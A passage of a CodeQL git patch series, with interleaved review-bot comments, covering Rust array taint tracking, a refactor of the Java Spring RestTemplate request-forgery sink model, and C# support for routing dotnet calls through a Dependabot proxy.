@@ -665,7 +665,7 @@ abstract class ContentSet extends TContentSet { abstract Content getAReadContent(); } -final private class SingletonContentSet extends ContentSet, TSingletonContentSet { +final class SingletonContentSet extends ContentSet, TSingletonContentSet { private Content c; SingletonContentSet() { this = TSingletonContentSet(c) } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index faf80143b54..17e7469cb51 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -1,10 +1,9 @@ private import rust private import codeql.dataflow.TaintTracking private import codeql.rust.controlflow.CfgNodes -private import DataFlowImpl private import codeql.rust.dataflow.FlowSummary -private import FlowSummaryImpl as FlowSummaryImpl private import DataFlowImpl +private import FlowSummaryImpl as FlowSummaryImpl module RustTaintTracking implements InputSig { predicate defaultTaintSanitizer(Node::Node node) { none() } @@ -35,6 +34,15 @@ module RustTaintTracking implements InputSig { pred.asExpr() = index.getBase() and succ.asExpr() = index ) + or + // Although data flow through collections is modeled using stores/reads, + // we also allow taint to flow out of a tainted collection. This is + // needed in order to support taint-tracking configurations where the + // source is a collection. + exists(ContentSet cs | + RustDataFlow::readStep(pred, cs, succ) and + cs.(SingletonContentSet).getContent() instanceof ArrayElementContent + ) ) or FlowSummaryImpl::Private::Steps::summaryLocalStep(pred.(Node::FlowSummaryNode).getSummaryNode(), 
@@ -46,7 +54,10 @@ module RustTaintTracking implements InputSig { * and inputs to additional taint steps. */ bindingset[node] - predicate defaultImplicitTaintRead(Node::Node node, ContentSet c) { none() } + predicate defaultImplicitTaintRead(Node::Node node, ContentSet cs) { + exists(node) and + cs.(SingletonContentSet).getContent() instanceof ArrayElementContent + } /** * Holds if the additional step from `src` to `sink` should be considered in diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected index 04b8539a2ee..3b727d29b67 100644 --- a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected @@ -6,3 +6,6 @@ | main.rs:23:13:23:13 | a | main.rs:23:13:23:19 | a as u8 | | | main.rs:24:10:24:10 | b | main.rs:24:10:24:17 | b as i64 | | | main.rs:38:23:38:23 | s | main.rs:38:23:38:29 | s[...] | | +| main.rs:54:14:54:16 | arr | main.rs:54:14:54:19 | arr[1] | | +| main.rs:64:24:64:24 | s | main.rs:64:24:64:27 | s[1] | | +| main.rs:69:9:69:12 | arr2 | main.rs:69:9:69:15 | arr2[1] | | diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected index 37ea5f51c78..626607e043c 100644 --- a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected 
@@ -3,6 +3,9 @@ edges | main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | provenance | | | main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | provenance | | | main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | provenance | | +| main.rs:53:19:53:28 | source(...) | main.rs:54:14:54:19 | arr[1] | provenance | | +| main.rs:69:9:69:12 | [post] arr2 [array[]] | main.rs:70:14:70:17 | arr2 | provenance | | +| main.rs:69:19:69:28 | source(...) | main.rs:69:9:69:12 | [post] arr2 [array[]] | provenance | | nodes | main.rs:12:13:12:22 | source(...) | semmle.label | source(...) | | main.rs:13:10:13:14 | ... + ... | semmle.label | ... + ... | 
@@ -10,9 +13,16 @@ nodes | main.rs:18:10:18:11 | - ... | semmle.label | - ... | | main.rs:22:13:22:22 | source(...) | semmle.label | source(...) | | main.rs:24:10:24:17 | b as i64 | semmle.label | b as i64 | +| main.rs:53:19:53:28 | source(...) | semmle.label | source(...) | +| main.rs:54:14:54:19 | arr[1] | semmle.label | arr[1] | +| main.rs:69:9:69:12 | [post] arr2 [array[]] | semmle.label | [post] arr2 [array[]] | +| main.rs:69:19:69:28 | source(...) | semmle.label | source(...) | +| main.rs:70:14:70:17 | arr2 | semmle.label | arr2 | subpaths testFailures #select | main.rs:13:10:13:14 | ... + ... | main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | $@ | main.rs:12:13:12:22 | source(...) | source(...) | | main.rs:18:10:18:11 | - ... | main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | $@ | main.rs:17:13:17:22 | source(...) | source(...) | | main.rs:24:10:24:17 | b as i64 | main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | $@ | main.rs:22:13:22:22 | source(...) | source(...) | +| main.rs:54:14:54:19 | arr[1] | main.rs:53:19:53:28 | source(...) | main.rs:54:14:54:19 | arr[1] | $@ | main.rs:53:19:53:28 | source(...) | source(...) | +| main.rs:70:14:70:17 | arr2 | main.rs:69:19:69:28 | source(...) | main.rs:70:14:70:17 | arr2 | $@ | main.rs:69:19:69:28 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index ad29e0094e4..71bababfba6 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -51,7 +51,7 @@ mod array_source { pub fn array_tainted() { let arr = source(76); - sink(arr[1]); // $ MISSING: hasTaintFlow=76 + sink(arr[1]); // $ hasTaintFlow=76 } } @@ -67,7 +67,7 @@ mod array_sink { pub fn array_with_taint() { let mut arr2 = [1, 2, 3]; arr2[1] = source(36); - sink(arr2); // $ MISSING: hasTaintFlow=36 + sink(arr2); // $ hasTaintFlow=36 } } 
From b20b7c7572104495ec8fddf957beb085c2597554 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 5 Dec 2024 10:43:13 +0000 Subject: [PATCH 0814/1267] Remove escaped "{" and "}" before counting placeholders --- .../semmle/code/java/frameworks/spring/SpringWebClient.qll | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index 79f0cb9c8bb..9e6ac2c8601 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll @@ -56,7 +56,10 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink i <= max(int occurrenceIndex, int occurrenceOffset | exists( - hsp.getStringValue().regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) + hsp.getStringValue() + .replaceAll("\\{", " ") + .replaceAll("\\}", " ") + .regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) ) and occurrenceOffset < hsp.getOffset() | @@ -78,6 +81,8 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink mc.getArgument(0) .(CompileTimeConstantExpr) .getStringValue() + .replaceAll("\\{", " ") + .replaceAll("\\}", " ") .regexpFind("\\{[^}]*\\}", occurrenceIndex, _) ) | From 3061d4a51694b91fdb59e7261f2a411cd1cb9d73 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Thu, 5 Dec 2024 11:53:12 +0100 Subject: [PATCH 0815/1267] Rust: Minor tweaks --- rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll | 2 +- .../lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 95d013814ed..b22b27c4db6 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll 
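Review bot: The `.replaceAll(...)` pairs added before `regexpFind` in both hunks must substitute filler of the same length as the escape they remove, because the `occurrenceOffset` found on the rewritten string is compared with `hsp.getOffset()`, which is measured on the original string. As rendered here the replacement looks one character wide for a two-character escape; whitespace on this page may be collapsed, so this needs checking in the file. If it is shorter, each escaped brace shifts later offsets left and a placeholder after the hostname prefix could be counted as preceding it. A comment such as `// same-length filler keeps offsets aligned with HostnameSanitizingPrefix.getOffset()` would pin the invariant. The same expression is carried into `urlHasPlaceholderAtOffset` by the later refactoring commit, and the enclosing class starts and ends outside these hunks.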
+++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -624,7 +624,7 @@ private class StructFieldContent extends Content, TStructFieldContent { } /** - * Content stored at an element in an array. + * An element in an array. */ final class ArrayElementContent extends Content, TArrayElement { ArrayElementContent() { this = TArrayElement() } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index 17e7469cb51..13f0052a5ba 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -39,9 +39,9 @@ module RustTaintTracking implements InputSig { // we also allow taint to flow out of a tainted collection. This is // needed in order to support taint-tracking configurations where the // source is a collection. - exists(ContentSet cs | + exists(SingletonContentSet cs | RustDataFlow::readStep(pred, cs, succ) and - cs.(SingletonContentSet).getContent() instanceof ArrayElementContent + cs.getContent() instanceof ArrayElementContent ) ) or From 347fd575a2c52e9d8ed7d227c7702c2541711ba3 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 5 Dec 2024 11:15:43 +0000 Subject: [PATCH 0816/1267] Refactor to avoid duplicated logic --- .../frameworks/spring/SpringWebClient.qll | 89 ++++++++++--------- 1 file changed, 48 insertions(+), 41 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index 9e6ac2c8601..a9c3cd3cdd8 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll 
@@ -30,20 +30,50 @@ class SpringWebClient extends Interface { private import semmle.code.java.security.RequestForgery +/** The method `getForObject` on `org.springframework.web.reactive.function.client.RestTemplate`. */ +class SpringRestTemplateGetForObjectMethod extends Method { + SpringRestTemplateGetForObjectMethod() { + this.getDeclaringType() instanceof SpringRestTemplate and + this.hasName("getForObject") + } +} + +/** A call to the method `getForObject` on `org.springframework.web.reactive.function.client.RestTemplate`. */ +class SpringRestTemplateGetForObjectMethodCall extends MethodCall { + SpringRestTemplateGetForObjectMethodCall() { + this.getMethod() instanceof SpringRestTemplateGetForObjectMethod + } + + /** Gets the first argument, if it is a compile time constant. */ + CompileTimeConstantExpr getConstantUrl() { result = this.getArgument(0) } + + /** + * Holds if the first argument is a compile time constant and it has a + * placeholder at offset `offset`, and there are `idx` placeholders that + * appear before it. + */ + predicate urlHasPlaceholderAtOffset(int idx, int offset) { + exists( + this.getConstantUrl() + .getStringValue() + .replaceAll("\\{", " ") + .replaceAll("\\}", " ") + .regexpFind("\\{[^}]*\\}", idx, offset) + ) + } +} + private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink { SpringWebClientRestTemplateGetForObject() { - exists(Method m, MethodCall mc, int i | - m.getDeclaringType() instanceof SpringRestTemplate and - m.hasName("getForObject") and - mc.getMethod() = m and - // Note that mc.getArgument(0) is modeled separately. This model is for - // arguments beyond the first two. There are two relevant overloads, one - // with third parameter type `Object...` and one with third parameter - // type `Map`. For the latter we cannot deal with mapvalue - // content easily but there is a default implicit taint read at sinks - // that will catch it. 
- this.asExpr() = mc.getArgument(i + 2) and - i >= 0 + exists(SpringRestTemplateGetForObjectMethodCall mc, int i | + // Note that the first argument is modeled as a request forgery sink + // separately. This model is for arguments beyond the first two. There + // are two relevant overloads, one with third parameter type `Object...` + // and one with third parameter type `Map`. For the latter we + // cannot deal with MapValue content easily but there is a default + // implicit taint read at sinks that will catch it. + i >= 0 and + this.asExpr() = mc.getArgument(i + 2) | // If we can determine that part of mc.getArgument(0) is a hostname // sanitizing prefix, then we count how many placeholders occur before it @@ -51,20 +81,9 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink // For the `Map` overload this has the effect of only // considering the map values as sinks if there is at least one // placeholder in the URL before the hostname sanitizing prefix. - exists(HostnameSanitizingPrefix hsp | - hsp = mc.getArgument(0) and - i <= - max(int occurrenceIndex, int occurrenceOffset | - exists( - hsp.getStringValue() - .replaceAll("\\{", " ") - .replaceAll("\\}", " ") - .regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) - ) and - occurrenceOffset < hsp.getOffset() - | - occurrenceIndex - ) + exists(int offset | + mc.urlHasPlaceholderAtOffset(i, offset) and + offset < mc.getConstantUrl().(HostnameSanitizingPrefix).getOffset() ) or // If we cannot determine that part of mc.getArgument(0) is a hostname 
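Review bot: The QLDoc on the new `SpringRestTemplateGetForObjectMethod` and `SpringRestTemplateGetForObjectMethodCall` classes names the type as `org.springframework.web.reactive.function.client.RestTemplate`, but Spring's `RestTemplate` lives in `org.springframework.web.client`; the reactive package is where `WebClient` lives. `SpringRestTemplate` is defined outside this hunk, so the QL presumably matches the right type and only the comments are off. Both should read `org.springframework.web.client.RestTemplate`. The doc for `urlHasPlaceholderAtOffset` could also say that `idx` is zero-based, since the sink class equates it with the vararg index `i`.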
@@ -74,24 +93,12 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink // For the `Map` overload this has the effect of only // considering the map values as sinks if there is at least one // placeholder in the URL. - not mc.getArgument(0) instanceof HostnameSanitizingPrefix and - i <= - max(int occurrenceIndex | - exists( - mc.getArgument(0) - .(CompileTimeConstantExpr) - .getStringValue() - .replaceAll("\\{", " ") - .replaceAll("\\}", " ") - .regexpFind("\\{[^}]*\\}", occurrenceIndex, _) - ) - | - occurrenceIndex - ) + not mc.getConstantUrl() instanceof HostnameSanitizingPrefix and + mc.urlHasPlaceholderAtOffset(i, _) or // If we cannot determine the string value of mc.getArgument(0), then we // conservatively consider all arguments as sinks. - not exists(mc.getArgument(0).(CompileTimeConstantExpr).getStringValue()) + not exists(mc.getConstantUrl().getStringValue()) ) } } From 537601290b235c80021d986e4245cbb18fbebc3a Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 11 Nov 2024 10:44:23 +0000 Subject: [PATCH 0817/1267] C#: Add `CODEQL_PROXY_*` environment variable names --- .../EnvironmentVariableNames.cs | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs index 345cb43453f..d825e5daeb0 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs 
@@ -74,5 +74,20 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// Specifies the location of the diagnostic directory. /// public const string DiagnosticDir = "CODEQL_EXTRACTOR_CSHARP_DIAGNOSTIC_DIR"; + + /// + /// Specifies the hostname of the Dependabot proxy. + /// + public const string ProxyHost = "CODEQL_PROXY_HOST"; + + /// + /// Specifies the hostname of the Dependabot proxy. + /// + public const string ProxyPort = "CODEQL_PROXY_PORT"; + + /// + /// Contains the certificate used by the Dependabot proxy. + /// + public const string ProxyCertificate = "CODEQL_PROXY_CA_CERTIFICATE"; } } From 232caa7185880c150566dd42224162be58feef33 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 11 Nov 2024 11:25:13 +0000 Subject: [PATCH 0818/1267] C#: Add `DependabotProxy` class --- .../DependabotProxy.cs | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs new file mode 100644 index 00000000000..5b47189c745 --- /dev/null +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs 
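Review bot: The summary on `ProxyPort` is a copy of the one on `ProxyHost` and says it "Specifies the hostname of the Dependabot proxy", although the constant names `CODEQL_PROXY_PORT`. I would change that doc comment to `/// Specifies the port of the Dependabot proxy.` The `ProxyCertificate` summary could also state the expected encoding of the value, since later code writes it to a `proxy.crt` file unchanged.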
@@ -0,0 +1,53 @@ +using System; +using System.IO; +using Semmle.Util; + +namespace Semmle.Extraction.CSharp.DependencyFetching +{ + internal class DependabotProxy + { + private readonly string? host; + private readonly string? port; + private readonly FileInfo? certFile; + + /// + /// The full address of the Dependabot proxy, if available. + /// + internal readonly string? Address; + + /// + /// Gets a value indicating whether a Dependabot proxy is configured. + /// + internal bool IsConfigured => !string.IsNullOrEmpty(this.Address); + + internal DependabotProxy(TemporaryDirectory tempWorkingDirectory) + { + // Obtain and store the address of the Dependabot proxy, if available. + this.host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); + this.port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); + + if (string.IsNullOrWhiteSpace(host) || string.IsNullOrWhiteSpace(port)) + { + return; + } + + this.Address = $"http://{this.host}:{this.port}"; + + // Obtain and store the proxy's certificate, if available. + var cert = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyCertificate); + + if (string.IsNullOrWhiteSpace(cert)) + { + return; + } + + var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); + Directory.CreateDirectory(certDirPath.FullName); + + this.certFile = new FileInfo(Path.Join(certDirPath.FullName, "proxy.crt")); + + using var writer = this.certFile.CreateText(); + writer.Write(cert); + } + } +} From 8ca75602d8a5c25abdd770e0958981cfcb6ed218 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Tue, 19 Nov 2024 12:26:54 +0000 Subject: [PATCH 0819/1267] C#: Initialise `DependabotProxy` in `DotNetCliInvoker` --- .../DotNet.cs | 2 +- .../DotNetCliInvoker.cs | 12 +++++++++++- 2 files changed, 12 insertions(+), 2 deletions(-) 
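Review bot: `Address` is built by interpolating `CODEQL_PROXY_HOST` and `CODEQL_PROXY_PORT` into `http://{host}:{port}` with only a whitespace check, so a non-numeric port or a host containing `/`, `@` or whitespace yields an address that points somewhere other than intended or fails to parse only when it is first used. I would validate before storing it, e.g. `if (!int.TryParse(this.port, out var portNumber) || !Uri.TryCreate($"http://{this.host}:{portNumber}", UriKind.Absolute, out _)) return;`, and log that the proxy settings were rejected. The class and its constructor also have no summary. A short doc comment should say that the constructor reads the three `CODEQL_PROXY_*` variables and writes the certificate under the temporary working directory.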
diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index edfea049a81..439f00754dd 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -27,7 +27,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching Info(); } - private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet")), logger, tempWorkingDirectory) { } + private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), tempWorkingDirectory), logger, tempWorkingDirectory) { } internal static IDotNet Make(IDotNetCliInvoker dotnetCliInvoker, ILogger logger) => new DotNet(dotnetCliInvoker, logger); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index 4295cce6716..b81b393e42a 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -12,12 +12,14 @@ namespace Semmle.Extraction.CSharp.DependencyFetching internal sealed class DotNetCliInvoker : IDotNetCliInvoker { private readonly ILogger logger; + private readonly DependabotProxy proxy; public string Exec { get; } - public DotNetCliInvoker(ILogger logger, string exec) + public DotNetCliInvoker(ILogger logger, string exec, TemporaryDirectory tempWorkingDirectory) { this.logger = logger; + this.proxy = new DependabotProxy(tempWorkingDirectory); this.Exec = exec; logger.LogInfo($"Using .NET CLI executable: '{Exec}'"); } 
@@ -38,6 +40,14 @@ namespace Semmle.Extraction.CSharp.DependencyFetching startInfo.EnvironmentVariables["DOTNET_CLI_UI_LANGUAGE"] = "en"; startInfo.EnvironmentVariables["MSBUILDDISABLENODEREUSE"] = "1"; startInfo.EnvironmentVariables["DOTNET_SKIP_FIRST_TIME_EXPERIENCE"] = "true"; + + // Configure the proxy settings, if applicable. + this.proxy.ApplyProxy(this.logger, startInfo); + + this.logger.LogInfo(startInfo.EnvironmentVariables["HTTP_PROXY"] ?? ""); + this.logger.LogInfo(startInfo.EnvironmentVariables["HTTPS_PROXY"] ?? ""); + this.logger.LogInfo(startInfo.EnvironmentVariables["SSL_CERT_FILE"] ?? ""); + return startInfo; } From 6cd5711313c9e47f39845b24051e6ecaee5df519 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Tue, 19 Nov 2024 13:23:05 +0000 Subject: [PATCH 0820/1267] C#: Set environment variables for proxy for calls to `dotnet` --- .../DependabotProxy.cs | 14 ++++++++++++++ .../DotNetCliInvoker.cs | 4 ---- 2 files changed, 14 insertions(+), 4 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 5b47189c745..96ba3452cef 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -1,6 +1,8 @@ using System; +using System.Diagnostics; using System.IO; using Semmle.Util; +using Semmle.Util.Logging; namespace Semmle.Extraction.CSharp.DependencyFetching { 
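Review bot: The three added `LogInfo` calls in the `@@ -38,6 +40,14 @@` hunk write the bare values of `HTTP_PROXY`, `HTTPS_PROXY` and `SSL_CERT_FILE`, so the log gets unlabelled and often empty lines. Because `startInfo.EnvironmentVariables` starts from the parent environment, an inherited proxy URL that embeds credentials would also be logged verbatim. If the output is wanted, I would log a labelled presence flag instead, e.g. `this.logger.LogInfo($"HTTP_PROXY set: {startInfo.EnvironmentVariables.ContainsKey("HTTP_PROXY")}");`. Separately, `ApplyProxy` is not part of the `DependabotProxy` class added in patch 0818 and only appears in patch 0820, so this commit presumably does not build on its own.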
@@ -49,5 +51,17 @@ namespace Semmle.Extraction.CSharp.DependencyFetching using var writer = this.certFile.CreateText(); writer.Write(cert); } + + internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) + { + // If the proxy isn't configured, we have nothing to do. + if (!this.IsConfigured) return; + + logger.LogInfo($"Setting up Dependabot proxy at {this.Address}"); + + startInfo.EnvironmentVariables["HTTP_PROXY"] = this.Address; + startInfo.EnvironmentVariables["HTTPS_PROXY"] = this.Address; + startInfo.EnvironmentVariables["SSL_CERT_FILE"] = this.certFile?.FullName; + } } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index b81b393e42a..522d3e9ffd4 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -44,10 +44,6 @@ namespace Semmle.Extraction.CSharp.DependencyFetching // Configure the proxy settings, if applicable. this.proxy.ApplyProxy(this.logger, startInfo); - this.logger.LogInfo(startInfo.EnvironmentVariables["HTTP_PROXY"] ?? ""); - this.logger.LogInfo(startInfo.EnvironmentVariables["HTTPS_PROXY"] ?? ""); - this.logger.LogInfo(startInfo.EnvironmentVariables["SSL_CERT_FILE"] ?? ""); - return startInfo; } From de415d68cfa0428c2b133c5311014aced6a8807a Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Fri, 29 Nov 2024 13:18:58 +0000 Subject: [PATCH 0821/1267] C#: Add more logging to `DependabotProxy` --- .../DependabotProxy.cs | 10 ++++++++-- .../DotNetCliInvoker.cs | 2 +- 2 files changed, 9 insertions(+), 3 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 96ba3452cef..c1db0b99017 100644 
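Review bot: In `ApplyProxy`, `SSL_CERT_FILE` is assigned `this.certFile?.FullName`, which is null whenever the constructor set `Address` but returned early because `CODEQL_PROXY_CA_CERTIFICATE` was empty. `IsConfigured` is still true in that case, so the child process gets a null or cleared `SSL_CERT_FILE` rather than keeping whatever it inherited. I would guard the assignment: `if (this.certFile != null) startInfo.EnvironmentVariables["SSL_CERT_FILE"] = this.certFile.FullName;`. The same unguarded value reappears as `this.proxy.CertificatePath` in the `DotNetCliInvoker.cs` hunk of patch 0827. Also worth a comment: the file holds only the proxy certificate, and `SSL_CERT_FILE` typically replaces the default CA bundle for the child rather than extending it.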
--- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -22,7 +22,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// internal bool IsConfigured => !string.IsNullOrEmpty(this.Address); - internal DependabotProxy(TemporaryDirectory tempWorkingDirectory) + internal DependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) { // Obtain and store the address of the Dependabot proxy, if available. this.host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); @@ -30,26 +30,32 @@ namespace Semmle.Extraction.CSharp.DependencyFetching if (string.IsNullOrWhiteSpace(host) || string.IsNullOrWhiteSpace(port)) { + logger.LogInfo("No Dependabot proxy credentials are configured."); return; } this.Address = $"http://{this.host}:{this.port}"; + logger.LogInfo($"Dependabot proxy configured at {this.Address}"); // Obtain and store the proxy's certificate, if available. var cert = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyCertificate); if (string.IsNullOrWhiteSpace(cert)) { + logger.LogInfo("No certificate configured for Dependabot proxy."); return; } var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); Directory.CreateDirectory(certDirPath.FullName); - this.certFile = new FileInfo(Path.Join(certDirPath.FullName, "proxy.crt")); + var certFilePath = Path.Join(certDirPath.FullName, "proxy.crt"); + this.certFile = new FileInfo(certFilePath); using var writer = this.certFile.CreateText(); writer.Write(cert); + + logger.LogInfo($"Stored Dependabot proxy certificate at {certFilePath}"); } internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) 
diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index 522d3e9ffd4..597acc58259 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -19,7 +19,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public DotNetCliInvoker(ILogger logger, string exec, TemporaryDirectory tempWorkingDirectory) { this.logger = logger; - this.proxy = new DependabotProxy(tempWorkingDirectory); + this.proxy = new DependabotProxy(logger, tempWorkingDirectory); this.Exec = exec; logger.LogInfo($"Using .NET CLI executable: '{Exec}'"); } From 87bd21e12c311cf57965c33eb058add1aebf16ec Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 13:40:37 +0000 Subject: [PATCH 0822/1267] C#: Use `Add` for environment variables --- .../DependabotProxy.cs | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index c1db0b99017..462cde58c87 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs 
